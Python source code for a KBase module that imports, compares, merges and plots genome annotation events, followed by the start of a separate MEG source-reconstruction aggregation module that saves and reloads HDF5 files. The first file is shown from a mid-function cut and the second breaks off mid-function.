                                  sep='\t',
                                  header=None,
                                  names=['gene', 'term'])

    # Drop exact duplicate (gene, term) rows, if any.
    annotations = annotations.drop_duplicates()

    ontology = {
        'event_id': params['description'],
        'description': params['description'],
        'ontology_id': params['ontology'],
        'method': method,  # from above
        'method_version': get_app_version(),
        "timestamp": datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S"),
        'ontology_terms': {},
        'gene_count': int(annotations['gene'].nunique()),  # not used in the api
        'term_count': int(annotations['term'].nunique())   # not used in the api
    }

    # Accumulate imported terms per gene, skipping rows without a term.
    for _, row in annotations.iterrows():
        if pd.notnull(row['term']):
            ontology['ontology_terms'].setdefault(row['gene'], []).append(
                {'term': row['term']})

    return [ontology]
def bulk_df_to_ontology(params):
    """Split a four-column bulk annotation TSV into one ontology event per
    (description, ontology) pair.

    The input file has columns gene, term, ontology, description. Rows are
    grouped by description, then by ontology; each group becomes one event
    dict for the annotation ontology API. Aborts the run via sys.exit() if
    an ontology string is not in allowed_ontologies.

    Returns:
        list of event dictionaries.
    """
    ontologies = []
    if 'debug' in params and params['debug'] is True:
        # Debug runs read from the module's test data instead of /staging.
        annotations_file_path = os.path.join(
            '/kb/module/test/test_data', params['annotation_file'])
    else:
        annotations_file_path = os.path.join("/staging/", params['annotation_file'])
    annotations = pd.read_csv(annotations_file_path,
                              sep='\t',
                              header=None,
                              names=['gene', 'term', 'ontology', 'description']
                              )
    for description, description_df in annotations.groupby(annotations['description']):
        for ontology, ontology_df in description_df.groupby(description_df['ontology']):
            if ontology.upper() not in allowed_ontologies:
                sys.exit(f"ERROR: {ontology} is not a valid Ontology string")
            time.sleep(2)  # This just "guarantees" the timestamps will all be different
            # Drop rows with no term, then exact duplicates.
            ontology_df = ontology_df[ontology_df['term'].notna()]
            ontology_df = ontology_df.drop_duplicates()
            # NOTE: rebinds the loop variable 'ontology' (the group key)
            # to the event dict being built.
            ontology = {
                'event_id': description,
                'description': description,
                'ontology_id': ontology.upper(),
                'method': "Import Bulk Annotations",
                'method_version': get_app_version(),
                "timestamp": datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S"),
                'ontology_terms': {},
                'gene_count': int(ontology_df['gene'].nunique()),  # not used in the api
                'term_count': int(ontology_df['term'].nunique())  # not used in the api
            }
            # add imported terms
            for index, row in ontology_df.iterrows():
                if pd.notnull(row['term']):
                    if row['gene'] in ontology['ontology_terms']:
                        ontology['ontology_terms'][row['gene']].append(
                            {'term': row['term']}
                        )
                    else:
                        ontology['ontology_terms'][row['gene']] = [
                            {'term': row['term']}
                        ]
            ontologies.append(ontology)
            logging.info(len(ontology['ontology_terms']))
            for gene in ontology['ontology_terms']:
                logging.info(description + "\t" + gene)
    return ontologies
def get_app_version():
    """Return this KBase module's version string from kbase.yml.

    Uses yaml.safe_load: yaml.load without an explicit Loader is unsafe on
    untrusted input and raises TypeError under PyYAML >= 6.
    """
    with open("/kb/module/kbase.yml", 'r') as stream:
        data_loaded = yaml.safe_load(stream)
    return str(data_loaded['module-version'])
def html_header():
    """Return the opening lines shared by every HTML report."""
    base_style = "<style>* {font-family: sans-serif; font-size: 14px}</style>"
    return [base_style]
def html_add_ontology_summary(params, ontology, api_results, output_directory):
    """Write the HTML summary report for the import annotations app.

    Args:
        params: app params; must contain 'genome', may contain
            'annotation_file' (the merge app calls this without one).
        ontology: list of ontology event dicts (as built by df_to_ontology).
        api_results: dict with 'output_ref', 'output_name', 'ftrs_found'
            and 'ftrs_not_found' from the annotation ontology API call.
        output_directory: directory the report file is written into.

    Returns:
        dict describing the report file (path/name/description) for the
        KBase report object.
    """
    logging.info(api_results)

    output_file = os.path.join(output_directory, "add_ontology_summary.html")

    # Make report directory and copy over files
    report = html_header()
    report.append('<h3>Import Annotations Summary</h3>')
    report.append(f'<b>Import App version:</b> {get_app_version()}<br>')
    if "annotation_file" in params:
        report.append(f'<b>Annotations file:</b> {params["annotation_file"]}<br>')
    report.append(f'<b>Input Ref:</b> {params["genome"]}<br>')
    report.append(f'<b>Output Ref:</b> {api_results["output_ref"]}<br>')
    report.append(f'<b>Output Name:</b> {api_results["output_name"]}<br><br>')
    report.append(f'<b>Features (found):</b> {api_results["ftrs_found"]}<br>')
    report.append(f'<b>Features (not found):</b> {len(api_results["ftrs_not_found"])}<br><br>')

    # One table row per import event.
    report.append(
        '<table cellspacing="0" cellpadding="3" border="1"><tr><th>Description</th><th>Timestamp</th><th>Ontology</th><th>Genes in file</th><th>Terms in file</th></tr>')
    for import_event in ontology:
        report.append(
            f'<tr style="background-color:#EEEEEE"><td>{import_event["description"].split(":")[0]}</td><td>{import_event["timestamp"]}</td><td>{import_event["ontology_id"]}</td><td>{import_event["gene_count"]}</td><td>{import_event["term_count"]}</td></tr>')
    report.append('</table>')

    # List genes that could not be matched to the genome.
    if len(api_results["ftrs_not_found"]) > 0:
        report.append(
            f'<br><b>These genes were not found in the genome:</b> <br>{("<br>").join(api_results["ftrs_not_found"])}<br>')

    # Write to file
    with open(output_file, 'w') as f:
        for line in report:
            f.write(line + "\n")

    return {'path': output_directory,
            'name': os.path.basename(output_file),
            'description': 'HTML report for import_annotations app'}
def get_event_lists(ontology):
    """Summarize each annotation event into de-duplicated feature lists.

    Only features typed "gene" in ontology['feature_types'] are counted;
    cds features are skipped.

    Args:
        ontology: dict with 'feature_types' (feature id -> type) and
            'events' (list of annotation event dicts).

    Returns:
        dict keyed by event_id; each value carries event metadata plus
        de-duplicated 'genes', 'terms', 'msrxns' and 'gene_msrxns' lists
        (order not guaranteed, since duplicates are removed via set()).
    """
    gene_features = {feat for feat, ftype in ontology['feature_types'].items()
                     if ftype == "gene"}

    events = {}
    for event in ontology["events"]:
        event_id = event['event_id']
        summary = {'genes': [],
                   'terms': [],
                   'msrxns': [],
                   'gene_msrxns': [],
                   'description': event['description'],
                   'timestamp': event['timestamp'],
                   'method': event['method'],
                   'method_version': event['method_version'],
                   'ontology_id': event['ontology_id']
                   }

        for gene, entries in event["ontology_terms"].items():
            if gene not in gene_features:
                continue
            summary['genes'].append(gene)
            for entry in entries:
                if "term" in entry:
                    summary['terms'].append(entry['term'])
                if "modelseed_ids" in entry:
                    summary['msrxns'] += entry['modelseed_ids']
                    summary['gene_msrxns'].extend(
                        gene + '_' + msrxn for msrxn in entry['modelseed_ids'])

        # De-duplicate each accumulated list.
        for field in ('genes', 'terms', 'msrxns', 'gene_msrxns'):
            summary[field] = list(set(summary[field]))
        events[event_id] = summary

    return events
def html_get_ontology_summary(event_summary, output_directory, to_highlight=None):
    """Write an HTML table summarizing the annotation events in a genome.

    Only gene features are counted (cds features are filtered upstream in
    get_event_lists).

    Args:
        event_summary: dict from get_event_lists().
        output_directory: directory the report file is written into.
        to_highlight: optional list of event descriptions whose rows get
            highlighted (used by the merge app). Defaults to none; a None
            default avoids the shared mutable-default-argument pitfall.

    Returns:
        dict describing the report file for the KBase report object.
    """
    if to_highlight is None:
        to_highlight = []

    output_file = os.path.join(output_directory, "get_ontology_summary.html")

    report = html_header()
    report.append('<h3>Compare Annotations Summary</h3>')
    report.append(
        '<table cellspacing="0" cellpadding="3" border="1"><tr><th>Description</th><th>Timestamp</th><th>KBase App</th><th>Ontology</th><th>Genes</th><th>Unique Terms</th><th>Unique ModelSEED rxns</th><th>Unique Gene/ModelSEED rxn pairs</th></tr>')

    # Get counts and add one row per event; highlighted rows mark the
    # events that fed a merge.
    for event in event_summary:
        if event_summary[event]["description"] in to_highlight:
            report.append(f'<tr style="background-color:#6CD075"><td>{event_summary[event]["description"].split(":")[0]}</td><td>{event_summary[event]["timestamp"]}</td><td>{event_summary[event]["method"]} v{event_summary[event]["method_version"]}</td><td>{event_summary[event]["ontology_id"]}</td><td>{len(event_summary[event]["genes"])}</td><td>{len(event_summary[event]["terms"])}</td><td>{len(event_summary[event]["msrxns"])}</td><td>{len(event_summary[event]["gene_msrxns"])}</td></tr>')
        else:
            report.append(f'<tr><td>{event_summary[event]["description"].split(":")[0]}</td><td>{event_summary[event]["timestamp"]}</td><td>{event_summary[event]["method"]} v{event_summary[event]["method_version"]}</td><td>{event_summary[event]["ontology_id"]}</td><td>{len(event_summary[event]["genes"])}</td><td>{len(event_summary[event]["terms"])}</td><td>{len(event_summary[event]["msrxns"])}</td><td>{len(event_summary[event]["gene_msrxns"])}</td></tr>')

    report.append('</table>')

    if len(to_highlight) > 0:
        report.append(
            '<span style="background-color:#6CD075;font-size:12px"><i>* these highlighted rows were used for the merge</i></span>')

    # Write to file
    with open(output_file, 'w') as f:
        for line in report:
            f.write(line + "\n")

    return {'path': output_directory,
            'name': os.path.basename(output_file),
            'description': 'Summary Report'}
def merge_details_report(df, output_directory):
    """Dump the merge scoring DataFrame as a tab-separated text file and
    return the KBase report-file descriptor for it."""
    details_path = os.path.join(output_directory, "merge_details.txt")
    df.to_csv(details_path, sep="\t", index=False)
    return {'path': output_directory,
            'name': os.path.basename(details_path),
            'description': 'Merge Details'}
def filter_selected_ontologies(ontology, params, workflow="compare"):
    '''
    Filter a genome's annotation events down to those selected in the UI.

    workflow="unique" ignores params and returns every event with a unique
    description. "compare" and "merge" filter to the events selected in the
    UI ('annotations_to_compare' / 'annotations_to_merge' in params); the
    merge workflow also attaches each event's annotation_weight. Both fall
    back to all unique events when nothing is selected, with the merge
    defaulting to a weight of 1.

    The unique functionality is added because of a current bug.
    '''
    ontology_selected = {"events": [],
                         "feature_types": ontology["feature_types"]}
    added_ontologies = []

    # the list of selections have different names depending on the app
    if workflow == "compare":
        selected_events = params['annotations_to_compare']
    elif workflow == "merge":
        selected_events = params['annotations_to_merge']
    elif workflow == "unique":
        selected_events = []

    for event in ontology["events"]:
        if event["description"] not in added_ontologies:  # keeps duplicates from being added twice
            if workflow == "unique":  # add all, don't filter
                ontology_selected['events'].append(event)
                added_ontologies.append(event["description"])
            else:
                if len(selected_events) == 0:  # if nothing is selected, then grab all events
                    if workflow == "merge":
                        event['annotation_weight'] = 1
                    ontology_selected['events'].append(event)
                    added_ontologies.append(event["description"])
                else:  # then grab only events in selected events, which is different for compare vs merge
                    if workflow == "compare":
                        if event["description"] in selected_events:
                            ontology_selected['events'].append(event)
                            added_ontologies.append(event["description"])
                    elif workflow == "merge":
                        # merge selections are dicts carrying both the
                        # annotation_source list and a weight for scoring
                        for selected_event in selected_events:
                            # add if event in selected events, or if the first annotation_source is empty
                            if event["description"] in selected_event["annotation_source"] or len(selected_events[0]['annotation_source']) == 0:
                                event['annotation_weight'] = selected_event["annotation_weight"]
                                ontology_selected['events'].append(event)
                                added_ontologies.append(event["description"])
    return ontology_selected
def merge_ontology_events(ontology):
    '''
    Collect annotation weights per gene / ModelSEED reaction / event triple.

    The annotation ontology api can put annotations in the cds features as
    well as the gene features; only gene features are considered here and
    cds annotations are ignored. Keying by gene -> reaction -> event id
    keeps a single event from double dipping and scoring twice for the same
    gene_msrxn pair.

    Returns:
        dict: merged[gene][MSRXN][event_id] = annotation_weight
    '''
    gene_features = {feat for feat, ftype in ontology['feature_types'].items()
                     if ftype == "gene"}

    merged = {}
    for event in ontology["events"]:
        event_id = event['event_id']
        for gene, entries in event["ontology_terms"].items():
            if gene not in gene_features:
                continue
            for entry in entries:
                for msrxn in entry.get("modelseed_ids", []):
                    merged.setdefault(gene, {}).setdefault(msrxn, {})[
                        event_id] = event['annotation_weight']
    return merged
def score_mergers(ontology_merged, params):
    '''
    Score each gene/ModelSEED-reaction pair against a merge threshold and
    return a pandas DataFrame suitable for the import annotations workflow.

    The score of a pair is the sum of the per-event annotation weights.
    With params['keep_best_annotation_only'] == 1 the gene's threshold is
    raised to its best score whenever that beats
    params['annotation_threshold'].

    Args:
        ontology_merged: dict from merge_ontology_events(),
            gene -> MSRXN -> {event_id: weight}.
        params: dict with 'keep_best_annotation_only' (0/1) and
            'annotation_threshold' (number).

    Returns:
        DataFrame with columns gene, term, score, gene_treshold (typo kept
        for downstream compatibility), one column per contributing event
        id, and a 0/1 'pass' column. All pairs are returned, passing or not.
    '''
    base_columns = ['gene', 'term', 'score', 'gene_treshold']
    rows = []
    for gene_id, reactions in ontology_merged.items():
        if params["keep_best_annotation_only"] == 1:
            # Best-only mode: raise the threshold to the gene's top score
            # when that beats the configured threshold.
            best_score = max(
                [0] + [sum(events.values()) for events in reactions.values()])
            gene_threshold = max(best_score, params["annotation_threshold"])
        else:
            gene_threshold = params["annotation_threshold"]
        for msrxn, events in reactions.items():
            msrxn_sum = sum(events.values())
            row = {'gene': gene_id,
                   'term': msrxn,
                   'score': msrxn_sum,
                   'gene_treshold': gene_threshold}
            row.update(events)  # one column per contributing event id
            row['pass'] = 1 if msrxn_sum >= gene_threshold else 0
            rows.append(row)
    if not rows:
        return pd.DataFrame(columns=base_columns)
    # Build the frame in one shot: DataFrame.append / Series.append were
    # removed in pandas 2.0, and row-wise appends were quadratic anyway.
    return pd.DataFrame(rows)
def plot_totals(event_summary, output_directory, descript_truncate=20):
    """Render a grouped bar chart of per-event feature totals.

    Counts genes, unique terms, unique ModelSEED reactions and unique
    gene/ModelSEED reaction pairs per annotation event and writes an
    interactive bokeh HTML file ('totals.html') into output_directory.

    Args:
        event_summary: dict from get_event_lists().
        output_directory: where totals.html is written.
        descript_truncate: max characters of the description shown on axes.

    Returns:
        dict describing the report file for the KBase report object.
    """
    # Build all rows first, then construct the frame once:
    # DataFrame.append was removed in pandas 2.0.
    rows = [{
        'DESCRIPTION': event_summary[event]["description"][:descript_truncate] + "...",
        'GENES': len(event_summary[event]["genes"]),
        'TERMS': len(event_summary[event]["terms"]),
        'MSRXNS': len(event_summary[event]["msrxns"]),
        'GENE_MSRXNS': len(event_summary[event]["gene_msrxns"])}
        for event in event_summary]
    df = pd.DataFrame(
        rows, columns=['DESCRIPTION', 'GENES', 'TERMS', 'MSRXNS', 'GENE_MSRXNS'])
    df = pd.melt(df, id_vars=['DESCRIPTION'], var_name="TYPE", value_name="COUNT")

    def group_by(group, **kwargs):
        # Called by the DynamicMap widget with 'Description' or 'Type'.
        if group == "Description":
            bars = hv.Bars(df, kdims=['DESCRIPTION', 'TYPE'])
        elif group == "Type":
            bars = hv.Bars(df, kdims=['TYPE', 'DESCRIPTION'])
        return bars

    sets = ['Description', 'Type']
    bars = hv.DynamicMap(group_by, kdims='Group').redim.values(Group=sets)

    bars.opts(
        opts.Bars(color=hv.Cycle('Colorblind'), show_legend=False, stacked=False,
                  tools=['hover'], width=150*len(event_summary.keys()), height=600, xrotation=90))

    p_path = os.path.join(output_directory, 'totals.html')

    caption = hv.Div("""
    This plot summarizes all of the unique features found in a genome object,
    grouped either by feature type (genes, unique terms, unique ModelSEED reactions,
    and unique gene/ModelSEED reaction pairs), or annotation description (that is,
    annotation source). Descriptions are truncated to first 20 characters.
    """).opts(width=150*len(event_summary.keys()))

    layout = hv.Layout(bars + caption).cols(1)

    hv.output(widget_location='top')
    hv.save(layout, p_path, backend='bokeh')

    return {'path': output_directory,
            'name': os.path.basename(p_path),
            'description': 'Totals Report'}
def plot_agreements(event_summary, output_directory, descript_truncate=25):
    """Render pairwise agreement/disagreement heatmaps between events.

    Writes an interactive bokeh HTML file ('agreements.html') into
    output_directory with two heatmaps per feature type: shared counts
    (symmetric) and counts unique to the column event (asymmetric).

    Args:
        event_summary: dict from get_event_lists().
        output_directory: where agreements.html is written.
        descript_truncate: max characters of the description shown on axes.

    Returns:
        dict describing the report file for the KBase report object.
    """
    def load_it_up(annotation_type, **kwargs):
        # Collect all rows, then build the frame once:
        # DataFrame.append was removed in pandas 2.0.
        rows = []
        for event1 in event_summary:
            a = set(event_summary[event1][annotation_type])
            for event2 in event_summary:
                if event1 != event2:
                    b = set(event_summary[event2][annotation_type])
                    rows.append({'A': event1[:descript_truncate] + "...",
                                 'B': event2[:descript_truncate] + "...",
                                 'AGREE': len(a & b),
                                 'DISAGREE': len(a - b)})
                else:
                    # Blank out the diagonal.
                    rows.append({'A': event1[:descript_truncate] + "...",
                                 'B': event2[:descript_truncate] + "...",
                                 'AGREE': None,
                                 'DISAGREE': None})
        shared_genes = pd.DataFrame(rows, columns=['A', 'B', 'AGREE', 'DISAGREE'])

        h1 = hv.HeatMap(shared_genes, ['A', 'B'], ['AGREE', 'DISAGREE'],
                        label="Agree (in row and column)")
        h2 = hv.HeatMap(shared_genes, ['A', 'B'], ['DISAGREE', 'AGREE'],
                        label="Disagree (in column only)")

        h1.opts(cmap='bgy')
        h2.opts(cmap='YlOrRd')

        caption = hv.Div("""
        These plot shows the pairwise agreements (left) and disagreements (right)
        between annotation events in a genome object.
        The agreements plot is symmetrical, showing the total annotation types
        found in both the row and the column events.
        The disagreements plot is non-symmetrical, showing the count of unique
        annotation types found in the column event, but missing from the row
        event. Descriptions are truncated to the first 20 characters.
        """).opts(width=500)

        return (h1 + h2 + caption).cols(2)

    sets = ['genes', 'msrxns', 'gene_msrxns']
    heatmap = hv.DynamicMap(load_it_up, kdims='Type').redim.values(Type=sets)

    hover = HoverTool(tooltips=[("Column", "@A"),
                                ("Row", "@B"),
                                ("Agree", "@AGREE"),
                                ("Disagree", '@DISAGREE')])

    heatmap.opts(
        opts.HeatMap(width=200+45*len(event_summary.keys()),
                     height=100+45*len(event_summary.keys()),
                     tools=[hover],
                     axiswise=False,
                     logz=False,
                     invert_yaxis=True,
                     labelled=[],
                     toolbar='right',
                     colorbar=True,
                     xrotation=30),
        opts.VLine(line_color='black'))

    p_path = os.path.join(output_directory, 'agreements.html')
    hv.output(widget_location='top')
    hv.save(heatmap, p_path, backend='bokeh')

    return {'path': output_directory,
            'name': os.path.basename(p_path),
            'description': 'Agreements Report'}
def compare_report_stack(html_reports, event_summary, output_directory, to_highlight=None):
    """Append the full set of compare-app HTML reports to html_reports.

    Args:
        html_reports: list of report-file descriptors; mutated in place.
        event_summary: dict from get_event_lists().
        output_directory: directory all report files are written into.
        to_highlight: optional list of event descriptions to highlight in
            the summary table. A None default avoids the shared
            mutable-default-argument pitfall.

    Returns:
        The same html_reports list, with four new entries.
    """
    if to_highlight is None:
        to_highlight = []
    html_reports.append(html_get_ontology_summary(event_summary, output_directory, to_highlight))
    html_reports.append(plot_totals(event_summary, output_directory))
    html_reports.append(plot_agreements(event_summary, output_directory))
    html_reports.append(plot_csc(event_summary, output_directory))
    return html_reports
def plot_csc(event_summary, output_directory, descript_truncate=50):
    """Render a cumulative-sum plot of new knowledge per annotation event.

    Events are consumed greedily: at each step the event contributing the
    most not-yet-seen features is drawn as a stacked horizontal segment,
    color-coded by which earlier event its features overlap. Writes an
    interactive bokeh HTML file ('csc.html') into output_directory.

    NOTE(review): the inner load_it_up uses DataFrame.append, which was
    removed in pandas 2.0 — confirm the pinned pandas version.

    Returns:
        dict describing the report file for the KBase report object.
    """
    def get_longest(type, modified_event_summary, aggregated_events):
        # Pick the event with the most features not already aggregated.
        current_longest = {'description': '', 'a': 0}
        for event in modified_event_summary:
            a = len(list(set(modified_event_summary[event][type]) - set(aggregated_events)))
            if a >= current_longest['a']:  # need >= in case the last one is 0
                current_longest = {'description': event, 'a': a}
        return current_longest['description']

    def load_it_up(type, **kwargs):
        # Called by the DynamicMap widget per feature type.
        processed_events = {}
        aggregated_events = []
        original_event_count = len(event_summary.keys())
        modified_event_summary = event_summary.copy()
        # bar_order = []
        baseline = 0
        df = pd.DataFrame(columns=['DESCRIPTION', 'COMPARISON', 'COUNT'])
        while len(processed_events.keys()) < original_event_count:
            # Pop the next-largest contributor and split its features into
            # overlap-with-previous-events vs genuinely new.
            l = modified_event_summary.pop(get_longest(
                type, modified_event_summary, aggregated_events))
            new_events = l[type]
            sub_baseline = baseline
            # get what overlaps with already processed events
            for event in processed_events:
                overlap = set(new_events) & set(processed_events[event])
                new_events = set(new_events) - set(processed_events[event])
                df = df.append(pd.Series(data={
                    'DESCRIPTION': l['description'][:descript_truncate], 'COMPARISON': event[:descript_truncate], 'COUNT': len(overlap), 'HIGH': sub_baseline, 'LOW': sub_baseline-len(overlap)}), ignore_index=True)
                sub_baseline -= len(overlap)
            processed_events[l['description']] = new_events
            aggregated_events = list(set(aggregated_events).union(set(new_events)))
            # if anything is left, add it has new events
            df = df.append(pd.Series(data={
                'DESCRIPTION': l['description'][:descript_truncate], 'COMPARISON': l['description'][:descript_truncate], 'COUNT': len(new_events), 'HIGH': baseline + len(new_events), 'LOW': baseline}), ignore_index=True)
            baseline = len(aggregated_events)
        # # flip the df order so plot order is flipped.
        df = df.loc[::-1].reset_index(drop=True)
        seg = hv.Segments(df, [hv.Dimension('LOW', label='Count'),
                               hv.Dimension('DESCRIPTION', label='Genome Event'),
                               'HIGH',
                               'DESCRIPTION'])
        return seg

    sets = ['genes', 'msrxns', 'gene_msrxns']
    seg = hv.DynamicMap(load_it_up, kdims='Type').redim.values(Type=sets)

    csc_hover = HoverTool(tooltips=[("Main", "@DESCRIPTION"),
                                    ("Comp", "@COMPARISON"),
                                    ("Count", "@COUNT")])

    seg.opts(line_width=40, color='COMPARISON', cmap='bgy_r', height=100+50*len(event_summary.keys()),
             width=800, tools=[csc_hover], invert_axes=False, xrotation=90)

    # bars.opts(
    #     opts.Bars(color=hv.Cycle('Colorblind'), invert_axes=True, show_legend=False, stacked=True,
    #               tools=['hover'], width=1000, height=100+50*len(event_summary.keys()), xrotation=90))

    caption = hv.Div("""
    This cumulative sum plot shows how the addition of new annotation events
    increases the unique list of features. The y-axis is ranked so the annotation event at the top
    contributes the most new knowledge, followed by the next event down, etc.
    The x-axis shows a count of these new annotation types, and are color coded
    for new annotations, or by the 'highest' annotation event that it overlaps.
    """).opts(width=800)

    layout = hv.Layout(seg + caption).cols(1)

    p_path = os.path.join(output_directory, 'csc.html')
    hv.output(widget_location='top')
    hv.save(layout, p_path, backend='bokeh')

    return {'path': output_directory,
            'name': os.path.basename(p_path),
            'description': 'CSC Report'}
if __name__ == "__main__":
    # Ad-hoc local smoke test against a dumped ontology JSON; paths are
    # developer-specific.
    ontology_selected = json.loads(
        open("/Users/kimbrel1/Desktop/get_ontology_dump_after_merge.json", "r").read())
    d = get_event_lists(ontology_selected)
    p_path = plot_totals(d, "/Users/kimbrel1/Desktop/")
    p_path = plot_csc(d, "/Users/kimbrel1/Desktop/")
    p_path = plot_agreements(d, "/Users/kimbrel1/Desktop/")
    print(p_path)
|
"""
Aggregate source reconstructed files across chunks and sessions into
one unified format.
Aggregation will combine individual ROIs into larger clusters more
suitable for MEG data.
The source reconstruction process outputs data frames that are
indexed by time, est_val, est_type, epoch etc. in the rows
and ROIs in the columns:
lh.wang2015atlas.V1v-lh ...
trial time est_key est_val
506 -1.500000 F 10 2.206130e-25 ...
-1.483333 F 10 3.374152e-25 ...
-1.466667 F 10 4.967676e-25 ...
-1.450000 F 10 6.293999e-25 ...
-1.433333 F 10 6.862688e-25 ...
After aggregation all chunks from one session will be combined. ROIs
will be aggregated into clusters. baseline corrected and converted to
percent signal change. Cluster can be averaged across hemis,
be lateralized or kept as is. The resulting structure is:
time -0.750000 ...
hemi cluster trial freq
Averaged HCPMMP1_audiotory_association 503 10 -73.221365 ...
504 10 -66.933821 ...
505 10 -64.982795 ...
506 10 -69.250634 ...
507 10 -35.822782 ...
Aggregated files can be saved in matlab readable HDF files. These
files are organized as follows:
/Averaged
/Cluster 1
- freq A: 2D dataset (trial x time)
- freq B ...
/Cluster 2
...
/Lateralized
...
Indices into the rows and columns of individual datasets are stored
in their attributes.
"""
import pandas as pd
import numpy as np
def aggregate_files(data_globstring, base_globstring, baseline_time,
                    hemis=['Averaged', 'Pair', 'Lateralized'],
                    cache=None):
    """Read source reconstructed files, compute power spectra during
    prestimulus baseline, and aggregate into area clusters.

    Args:
        data_globstring: globstring that selects data files
        base_globstring: globstring that selects baseline files
        baseline_time: 2-tuple
            Defines time to use for computing spectra
        hemis: List of strings
            Can contain the following:
            'Averaged': Mean over hemispheres per area
            'Pair': Return areas as they are per hemisphere
            'Lateralized': Subtract left from right hemisphere
        cache: optional pymeg Cache instance; a fresh one is created if None.

    Returns:
        DataFrame that contains time points as columns and is indexed
        by time, frequency and cluster in the row index.
    """
    from pymeg.contrast_tfr import Cache
    tfr_baseline = None
    if not (data_globstring == base_globstring):
        with Cache() as base_cache:
            tfr_baseline = base_cache.get(base_globstring)
            tfr_baseline = tfr_baseline.groupby(['freq', 'area']).mean()
    if cache is None:
        cache = Cache()
    tfr_data = cache.get(data_globstring)

    # Broadband signal restricted to the baseline window.
    baseline = tfr_data.loc[:, slice(*baseline_time)]
    nsmps = baseline.shape[1]  # number of samples in baseline period

    # Row-wise power spectrum of the baseline segment, built in one
    # vectorized step (replaces the old per-column copy loop).
    spectra = np.abs(np.fft.fft(baseline.values)) ** 2
    # Frequency axis for the spectra — assumes a 400 Hz sampling rate
    # (TODO confirm against the recording parameters).
    freqs = np.fft.fftfreq(nsmps) * 400
    basepow = pd.DataFrame(spectra, index=baseline.index, columns=freqs)

    aggs = aggregate(basepow, hemis)  # aggregate into area clusters
    return aggs
def agg2hdf(agg, filename):
    """Convert an aggregate into a HDF file.

    The resulting HDF file encodes the hemi and cluster
    index hierarchically as groups. Each frequency is a dataset
    that is itself 2D: trials x time.

    Indices into the 2D datasets are saved in the datasets attrs.
    Row indices are prefixed with 'rows_' and column indices with
    'cols_'.

    Args:
        agg: DataFrame
        filename: str
            Path to file.
    """
    import h5py
    with h5py.File(filename, mode='w') as store:
        for (hemi, cluster, freq), data in agg.groupby(['hemi', 'cluster', 'freq']):
            try:
                grp = store.create_group(hemi + '/' + cluster)
            except ValueError:
                # Group already exists from an earlier frequency; reuse it.
                grp = store[hemi + '/' + cluster]
            dset = grp.create_dataset(
                str(freq), data=data.values, compression="gzip", compression_opts=7)
            # Column index (time) plus one attr per row-index level.
            dset.attrs['cols_time'] = data.columns.values.astype(float)
            for index in data.index.names:
                index_vals = data.index.get_level_values(index).values
                if index_vals.dtype == object:
                    # HDF attrs can't hold arbitrary objects; store as utf-8.
                    index_vals = [str(i).encode('utf-8') for i in index_vals]
                dset.attrs[
                    'rows_' + index] = index_vals
def delayed_agg(filename, hemi=None, cluster=None, freq=None):
    """Return a zero-argument callable that loads the aggregate lazily.

    Wraps hdf2agg in functools.partial so the (potentially slow) load can
    be deferred, e.g. handed to parallel workers.
    """
    from functools import partial
    return partial(hdf2agg, filename, hemi=hemi, cluster=cluster, freq=freq)
def hdf2agg(filenames, hemi=None, cluster=None, freq=None):
    """Load aggregates from one or more HDF files and concatenate them."""
    frames = [_hdf2agg(fname, hemi, cluster, freq)
              for fname in ensure_iter(filenames)]
    return pd.concat(frames)
def _hdf2agg(filename, hemi=None, cluster=None, freq=None):
    """Convert HDF file back to aggregate DataFrame.

    Args:
        filename: Path to aggregate file
        hemi: str, default None
            Restrict return to these hemi combination strategy.
        cluster: str, default None
            Restrict return to this cluster
        freq: int, default None
            Restrict return to this frequency
    Returns:
        DataFrame indexed by hemi, cluster, trial and freq in the rows
        and time in the columns.
    """
    import h5py

    # Filters: a None argument means "accept everything" at that level.
    def _want_hemi(name):
        return hemi is None or str(hemi) == name

    def _want_cluster(name):
        if cluster is None:
            return True
        return any(str(c) == name for c in ensure_iter(cluster))

    def _want_freq(name):
        return freq is None or str(freq) == name

    frames = []
    with h5py.File(filename, mode='r') as store:
        for hemi_name, hemi_grp in store.items():
            if not _want_hemi(hemi_name):
                continue
            for cluster_name, cluster_grp in hemi_grp.items():
                if not _want_cluster(cluster_name):
                    continue
                for freq_name, freq_dset in cluster_grp.items():
                    if not _want_freq(freq_name):
                        continue
                    frames.append(get_df_from_hdf(freq_dset))
    return pd.concat(frames)
def get_df_from_hdf(dataset):
    """Convert HDF dataset to pandas Dataframe.

    Row index levels come from 'rows_*' attrs, column index levels from
    'cols_*' attrs; byte-typed attrs are decoded and, when possible,
    converted to floats.
    """
    row_arrays, row_names = [], []
    col_arrays, col_names = [], []
    for key, values in dataset.attrs.items():
        if 'bytes' in values.dtype.name:
            # Stored as UTF-8 bytes by agg2hdf; decode, then try numeric.
            values = values.astype('U')
            try:
                values = [float(v) for v in values]
            except ValueError:
                pass
        if key.startswith('cols_'):
            col_arrays.append(values)
            col_names.append(key.replace('cols_', ''))
        elif key.startswith('rows_'):
            row_arrays.append(values)
            row_names.append(key.replace('rows_', ''))
    index = pd.MultiIndex.from_arrays(row_arrays)
    index.names = row_names
    columns = pd.MultiIndex.from_arrays(col_arrays)
    columns.names = col_names
    return pd.DataFrame(dataset[:], index=index, columns=columns)
def aggregate(tfr_data, hemis):
    """Aggregate individual areas into clusters.

    Args:
        tfr_data: DataFrame indexed (at least) by 'area', 'freq' and
            'trial' in the rows, with time as columns.
        hemis: iterable of hemisphere-combination strategies; each entry
            is expected to be 'Pair', 'Lateralized' or 'Averaged'.

    Returns:
        DataFrame indexed by hemi, cluster, trial and freq.
    """
    from itertools import product
    from pymeg import atlas_glasser
    all_clusters, _, _, _ = atlas_glasser.get_clusters()
    clusters = []
    tfr_areas = np.unique(tfr_data.index.get_level_values('area'))
    for hemi, cluster in product(hemis, all_clusters.keys()):
        print('Working on %s, %s' % (hemi, cluster))
        # Split the cluster's atlas areas by hemisphere substring...
        tfrs_rh = [area for area in all_clusters[cluster] if 'rh' in area]
        tfrs_lh = [area for area in all_clusters[cluster] if 'lh' in area]
        # ...then match them case-insensitively against the areas that are
        # actually present in tfr_data.
        tfrs_rh = [t for t in tfr_areas if any(
            [a.lower() in t.lower() for a in tfrs_rh])]
        tfrs_lh = [t for t in tfr_areas if any(
            [a.lower() in t.lower() for a in tfrs_lh])]
        lh_idx = tfr_data.index.isin(tfrs_lh, level='area')
        rh_idx = tfr_data.index.isin(tfrs_rh, level='area')
        # Average across matched areas within each hemisphere, per freq/trial.
        left = tfr_data.loc[lh_idx, :].groupby(
            ['freq', 'trial']).mean()
